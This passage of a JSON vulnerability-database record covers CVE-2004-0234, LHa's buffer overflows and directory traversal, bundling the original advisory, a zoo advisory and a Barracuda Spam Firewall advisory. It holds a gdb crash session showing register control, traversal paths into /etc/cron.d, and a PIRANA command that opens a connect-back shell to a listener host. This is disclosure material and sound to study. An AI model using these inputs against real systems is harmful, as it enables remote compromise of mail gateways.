    "data": "Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. \nThe first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. \nThe second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. \n**NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. \n**Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. \n\nThese vulnerabilities are related to:\nSA11510\nSA19002\n\nSuccessful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------\n\nLHa buffer overflows and directory traversal problems\n\nPROGRAM: LHa (Unix version)\nVENDOR: various people\nVULNERABLE VERSIONS: 1.14d to 1.14i\n                     1.17 (Linux binary)\n                     possibly others\nIMMUNE VERSIONS: 1.14i with my patch applied\n                 1.14h with my patch applied\nLHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm\n          http://www2m.biglobe.ne.jp/~dolphin/lha/prog/\nLHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/\nREFERENCES: CAN-2004-0234 (buffer overflows)\n            CAN-2004-0235 (directory traversal)\n\n* DESCRIPTION *\n\nLHa is a console-based program for packing and unpacking LHarc\narchives. \n\nIt is one of the packages in Red Hat Linux, Fedora Core, SUSE\nLinux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux,\nGentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. \nIt is also included in the port/package collections for FreeBSD,\nOpenBSD and NetBSD. \n\n* OVERVIEW *\n\nLHa has two stack-based buffer overflows and two directory traversal\nproblems. They can be abused by malicious people in many different\nways: some mail virus scanners require LHa and run it automatically\non attached files in e-mail messages. Some web applications allow\nuploading and unpacking of LHarc archives. Some people set up their\nweb browsers to start LHa automatically after downloading an LHarc\narchive. Finally, social engineering is probably quite effective\nin this case. The cause of the problem is the function\nget_header() in header.c. This function first reads the lengths of\nfilenames or directory names from the archive, and then it reads\nthat many bytes to a char array (one for filenames and one for\ndirectory names) without checking if the array is big enough. \n\nBy exploiting this bug, you get control over several registers\nincluding EIP, as you can see in this session capture:\n\n$ lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\nSegmentation fault\n$ gdb lha\nGNU gdb Red Hat Linux (5.3post-0.20021129.18rh)\nCopyright 2003 Free Software Foundation, Inc. \nGDB is free software, covered by the GNU General Public License, and\nyou are welcome to change it and/or distribute copies of it under\ncertain conditions. \nType \"show copying\" to see the conditions. \nThere is absolutely no warranty for GDB. Type \"show warranty\" for\ndetails. \nThis GDB was configured as \"i386-redhat-linux-gnu\"... \n(gdb) r x buf_oflow.lha\nStarting program: /usr/bin/lha x buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffdd50 0xbfffdd50\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210282 2163330\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) r t buf_oflow.lha\nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y\nStarting program: /usr/bin/lha t buf_oflow.lha\nLHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU\nUUUUUUUUUUUUU\n\nProgram received signal SIGSEGV, Segmentation fault. \n0x55555555 in ?? ()\n(gdb) bt\n#0 0x55555555 in ?? ()\nCannot access memory at address 0x55555555\n(gdb) i r\neax 0x4001e4a0 1073865888\necx 0xffffffe0 -32\nedx 0x24 36\nebx 0x55555555 1431655765\nesp 0xbfffe6d0 0xbfffe6d0\nebp 0x55555555 0x55555555\nesi 0x55555555 1431655765\nedi 0x55555555 1431655765\neip 0x55555555 0x55555555\neflags 0x210286 2163334\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x33 51\n(gdb) q\nThe program is running. Exit anyway? (y or n) y\n$\n\nb) two directory traversal problems\n\nLHa has directory traversal problems, both with absolute paths\nand relative paths. There is no protection against relative paths\nat all, so you can simply use the lha binary to create an archive\nwith paths like \"../../../../../etc/cron.d/evil\". There is some\nsimple protection against absolute paths, namely skipping the first\ncharacter if it is a slash, but again you can simply use the binary\nto create archives with paths like \"//etc/cron.d/evil\". \n\n* ATTACHED FILES *\n\nI have written a patch against version 1.14i that corrects all\nfour problems. The patch is included as an attachment, together\nwith some test archives. \n\n* TIMELINE *\n\n18 Apr: contacted the vendor-sec list and the LHa 1.14 author\n18 Apr: tried to contact the LHa 1.17 author with a web form and\n        a guessed e-mail address which bounced\n19 Apr: reply from the vendor-sec list with CVE references\n30 Apr: Red Hat released their advisory\n01 May: I release this advisory\n\n// Ulf Harnhammar\nAdvogato diary :: http://www.advogato.org/person/metaur/\nidiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/\nDebian Security Audit Project :: http://shellcode.org/Audit/\n\n------------------------------------------------------------------------\n. \n\nTITLE:\nZoo \"fullpath()\" File Name Handling Buffer Overflow\n\nSECUNIA ADVISORY ID:\nSA19002\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/19002/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nDoS, System access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nzoo 2.x\nhttp://secunia.com/product/8297/\n\nDESCRIPTION:\nJean-S\\xe9bastien Guay-Leroux has discovered a vulnerability in zoo,\nwhich can be exploited by malicious people to cause a DoS (Denial of\nService) and potentially to compromise a user\u0027s system. This can be exploited to cause a\nbuffer overflow when a specially-crafted ZOO archive containing a\nfile with an overly long file and directory name is processed (e.g. \nlisting archive contents or adding new files to the archive). \n\nThe vulnerability has been confirmed in version 2.10. Other versions\nmay also be affected. \n\nSOLUTION:\nRestrict use to trusted ZOO archives. \n\nPROVIDED AND/OR DISCOVERED BY:\nJean-S\\xe9bastien Guay-Leroux\n\nORIGINAL ADVISORY:\nhttp://www.guay-leroux.com/projects/zoo-advisory.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Topic:                  Barracuda LHA archiver security bug leads to\n                        remote compromise\n\nAnnounced:              2006-04-03\nProduct:                Barracuda Spam Firewall\nVendor:                 http://www.barracudanetworks.com/\nImpact:                 Remote shell access\nAffected product:       Barracuda with firmware \u003c 3.3.03.022 AND\n                        spamdef \u003c 3.0.10045\nCredits:                Jean-S\\xe9bastien Guay-Leroux\nCVE ID:                 CVE-2004-0234\n\n\nI.      BACKGROUND\n\nThe Barracuda Spam Firewall is an integrated hardware and software solution for\ncomplete protection of your email server. It provides a powerful, easy to use,\nand affordable solution to eliminating spam and virus from your organization by\nproviding the following protection:\n\n * Anti-spam\n * Anti-virus\n * Anti-spoofing\n * Anti-phishing\n * Anti-spyware (Attachments)\n * Denial of Service\n\n\nII.     DESCRIPTION\n\nWhen building a special LHA archive with long filenames in it, it is possible to\noverflow a buffer on the stack used by the program and seize control of the\nprogram. \n\nSince this component is used when scanning an incoming email, remote compromise\nis possible by sending a simple email with the specially crafted LHA archive\nattached to the Barracuda Spam Firewall. \n\nYou do NOT need to have remote administration access (on port 8000) for\nsuccessfull exploitation. \n\nFor further informations about the details of the bugs, you can consult OSVDB\n#5753 and #5754 . \n\n\nIII.    IMPACT\n\nGain shell access to the remote Barracuda Spam Firewall\n\n\nIV.     PROOF OF CONCEPT\n\nUsing the PIRANA framework, available at http://www.guay-leroux.com , it is\npossible to test the Barracuda Spam Firewall against the LHA vulnerability. \n\nBy calling PIRANA the way it is described below, you will get a TCP connect back\nshell on IP address 1.2.3.4 and port 1234:\n\nperl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \\\n-p 1234 -z -c 1 -d 1\n\n\nV.      SOLUTION\n\nBarracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,\navailable March 24th 2006. \n\nThey also published an official patch in firmware #3.3.03.022, available April\n3rd 2006. \n\nIt is recommended to update to firmware #3.3.03.022 . \n\n\nVI.     CREDITS\n\nUlf Harnhammar who found the original LHA flaw. \n\nJean-S\\xe9bastien Guay-Leroux who conducted further research on the bug\nand produced exploitation plugin for the PIRANA framework. \n\n\nVII.    REFERENCES\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234\n\n\nVIII.   HISTORY\n\n2006-03-02 : Disclosure of vulnerability to Barracuda Networks\n2006-03-02 : Acknowledgement of the problem\n2006-03-24 : Problem fixed\n2006-04-03 : Advisory disclosed to public\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0234"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000169"
      },
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8664"
      },
      {
        "db": "PACKETSTORM",
        "id": "45159"
      },
      {
        "db": "PACKETSTORM",
        "id": "33241"
      },
      {
        "db": "PACKETSTORM",
        "id": "44104"
      },
      {
        "db": "PACKETSTORM",
        "id": "45164"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-8664",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8664"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2004-0234",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "10243",
        "trust": 2.8
      },
      {
        "db": "OSVDB",
        "id": "5754",
        "trust": 2.5
      },
      {
        "db": "OSVDB",
        "id": "5753",
        "trust": 2.5
      },
      {
        "db": "SECTRACK",
        "id": "1015866",
        "trust": 2.5
      },
      {
        "db": "SECUNIA",
        "id": "19514",
        "trust": 1.8
      },
      {
        "db": "VUPEN",
        "id": "ADV-2006-1220",
        "trust": 1.7
      },
      {
        "db": "XF",
        "id": "16012",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000169",
        "trust": 0.8
      },
      {
        "db": "FULLDISC",
        "id": "20040501 LHA BUFFER OVERFLOWS AND DIRECTORY TRAVERSAL PROBLEMS",
        "trust": 0.6
      },
      {
        "db": "FULLDISC",
        "id": "20040502 LHA LOCAL STACK OVERFLOW PROOF OF CONCEPT CODE",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FEDORA-2004-119",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FLSA:1833",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:179",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:178",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20060403 BARRACUDA LHA ARCHIVER SECURITY BUG LEADS TO REMOTE COMPROMISE",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20040510 [ULF HARNHAMMAR]: LHA ADVISORY + PATCH",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:977",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:9881",
        "trust": 0.6
      },
      {
        "db": "GENTOO",
        "id": "GLSA-200405-02",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-515",
        "trust": 0.6
      },
      {
        "db": "CONECTIVA",
        "id": "CLA-2004:840",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-202",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "33241",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-8664",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "45159",
        "trust": 0.1
      },
      {
        "db": "SECUNIA",
        "id": "19002",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "44104",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "45164",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8664"
      },
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000169"
      },
      {
        "db": "PACKETSTORM",
        "id": "45159"
      },
      {
        "db": "PACKETSTORM",
        "id": "33241"
      },
      {
        "db": "PACKETSTORM",
        "id": "44104"
      },
      {
        "db": "PACKETSTORM",
        "id": "45164"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0234"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ]
  },
  "id": "VAR-200408-0140",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8664"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:30:26.313000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "LHA for UNIX Version 1.17",
        "trust": 0.8,
        "url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://lha.sourceforge.jp/"
      },
      {
        "title": "RHSA-2004:178",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-178.html"
      },
      {
        "title": "RHSA-2004:179",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-179.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000169"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8664"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0234"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/10243"
      },
      {
        "trust": 2.5,
        "url": "http://securitytracker.com/id?1015866"
      },
      {
        "trust": 2.0,
        "url": "http://www.redhat.com/archives/fedora-announce-list/2004-may/msg00005.html"
      },
      {
        "trust": 1.8,
        "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2004/dsa-515"
      },
      {
        "trust": 1.7,
        "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
      },
      {
        "trust": 1.7,
        "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020776.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020778.html"
      },
      {
        "trust": 1.7,
        "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
      },
      {
        "trust": 1.7,
        "url": "http://www.guay-leroux.com/projects/barracuda-advisory-lha.txt"
      },
      {
        "trust": 1.7,
        "url": "http://www.osvdb.org/5753"
      },
      {
        "trust": 1.7,
        "url": "http://www.osvdb.org/5754"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-178.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-179.html"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/19514"
      },
      {
        "trust": 1.6,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
      },
      {
        "trust": 1.4,
        "url": "http://www.frsirt.com/english/advisories/2006/1220"
      },
      {
        "trust": 1.4,
        "url": "http://xforce.iss.net/xforce/xfdb/16012"
      },
      {
        "trust": 1.4,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:977"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a977"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9881"
      },
      {
        "trust": 1.1,
        "url": "http://www.vupen.com/english/advisories/2006/1220"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0234"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0234"
      },
      {
        "trust": 0.8,
        "url": "http://osvdb.org/5753"
      },
      {
        "trust": 0.8,
        "url": "http://osvdb.org/5754"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108422737918885\u0026w=2"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:9881"
      },
      {
        "trust": 0.4,
        "url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
      },
      {
        "trust": 0.3,
        "url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
      },
      {
        "trust": 0.3,
        "url": "http://www.stalker.com/cgpmcafee/"
      },
      {
        "trust": 0.3,
        "url": "http://www.f-secure.com/security/fsc-2004-1.shtml"
      },
      {
        "trust": 0.3,
        "url": "http://mail.stalker.com/lists/cgatepro/message/61244.html"
      },
      {
        "trust": 0.3,
        "url": "http://images.mcafee.com/misc/mcafee_security_bulletin_05-march-17.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-178.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-219.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.rarsoft.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.winzip.com/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/366265"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/about_secunia_advisories/"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/advisories/19002/"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=108422737918885\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000840"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044875.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/4639/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/19514/"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044874.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/11510/"
      },
      {
        "trust": 0.1,
        "url": "http://shellcode.org/audit/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0234"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0235"
      },
      {
        "trust": 0.1,
        "url": "http://idiosynkratisk.tk/"
      },
      {
        "trust": 0.1,
        "url": "http://www.advogato.org/person/metaur/"
      },
      {
        "trust": 0.1,
        "url": "http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm"
      },
      {
        "trust": 0.1,
        "url": "http://www2m.biglobe.ne.jp/~dolphin/lha/prog/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/8297/"
      },
      {
        "trust": 0.1,
        "url": "http://www.guay-leroux.com/projects/zoo-advisory.txt"
      },
      {
        "trust": 0.1,
        "url": "http://www.barracudanetworks.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.guay-leroux.com"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8664"
      },
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000169"
      },
      {
        "db": "PACKETSTORM",
        "id": "45159"
      },
      {
        "db": "PACKETSTORM",
        "id": "33241"
      },
      {
        "db": "PACKETSTORM",
        "id": "44104"
      },
      {
        "db": "PACKETSTORM",
        "id": "45164"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0234"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-8664"
      },
      {
        "db": "BID",
        "id": "10243"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000169"
      },
      {
        "db": "PACKETSTORM",
        "id": "45159"
      },
      {
        "db": "PACKETSTORM",
        "id": "33241"
      },
      {
        "db": "PACKETSTORM",
        "id": "44104"
      },
      {
        "db": "PACKETSTORM",
        "id": "45164"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0234"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-08-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8664"
      },
      {
        "date": "2004-04-30T00:00:00",
        "db": "BID",
        "id": "10243"
      },
      {
        "date": "2008-05-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000169"
      },
      {
        "date": "2006-04-04T19:25:51",
        "db": "PACKETSTORM",
        "id": "45159"
      },
      {
        "date": "2004-05-04T04:25:06",
        "db": "PACKETSTORM",
        "id": "33241"
      },
      {
        "date": "2006-02-25T00:55:07",
        "db": "PACKETSTORM",
        "id": "44104"
      },
      {
        "date": "2006-04-04T19:39:53",
        "db": "PACKETSTORM",
        "id": "45164"
      },
      {
        "date": "2004-08-18T04:00:00",
        "db": "NVD",
        "id": "CVE-2004-0234"
      },
      {
        "date": "2004-04-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8664"
      },
      {
        "date": "2009-07-12T04:07:00",
        "db": "BID",
        "id": "10243"
      },
      {
        "date": "2008-05-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000169"
      },
      {
        "date": "2017-10-11T01:29:24.730000",
        "db": "NVD",
        "id": "CVE-2004-0234"
      },
      {
        "date": "2007-05-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "45164"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-202"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "LHa Vuffer Overflow Vulnerability in Testing and Extracting Process",
    "sources": [
      {
        "db": "JVNDB",
